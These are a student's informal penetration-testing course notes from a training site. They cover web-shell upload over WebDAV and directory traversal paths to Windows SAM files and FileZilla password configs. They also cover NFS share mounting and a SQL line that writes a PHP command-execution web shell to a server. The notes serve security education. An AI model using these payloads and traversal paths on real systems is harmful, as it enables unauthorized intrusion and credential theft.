< All Advanced Penetration Testing Notes

Nathanf | Advanced Penetration Testing | Module 7 - Exploitation

By: Nathanf | Related Course: Advanced Penetration Testing | Published: November 14, 2016 | Modified: November 14, 2016
Join Cybrary

Notepadexploit 1

cadaver, webDav

kali has pre built web shells in different languages

 

Step 1 – upload a file to server that executes code for you or allows you to execute code (webshell)

-upload a file that takes command injection via url query parameters

 

This can also be userd done via metasploit

-for reverse tcp  set exitOnSessionto false for options so it doesnt stop listening on first response

 


Notepadexploit 3

Directory traversal, Dump sam files to discover usernames and passwords

Directory traversal – can also be done from url

index?../../../../../bin.etc if it says save file weve found it otherwise we havent found it

WINDOWS/system32/sam

Windows/repair/sam   – save file but you need syskey to access it  from

../../../../../WINDOWS/repair/system

 

filezilla ftp

../../../../../xamp/FileZillaFtp/FileZilla server.xml congig filezilla file stores passwords


NotepadExploit 4

/tikiwiki

search metasploit for exploits


Notepadexploit 6

whoami   =  display which user you are


Notepadexploit 6

display network file system: in cli ->   showmount -e ’ip’

 

 

to export network filesystem

mount -t -o noclock nfs ’ip’ :/exportDir /exportlocation

 

 

hidden files ls -a

.ssh file store keys

 

co


Notepadexploitation 2

open web interface – phpmyadmin can use sql injection commands

 

creating a system command shell which accepts a parameter via url,  to sit on the server via sql 

run system command    ->

select ”<?php system($_GET[’cmd’]); ?” into outfile ”C:\\xamp\\htdocs\\shell.php”

 

\\ = escape, so you dont end up with a long file name on the system

 

at ftpd — daemon –bind-address ’ip’ /tmp

netstat antp

daemon = it will listen 

 

other shell -> powershell

tfpt = Tivial file transfer protocol


< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel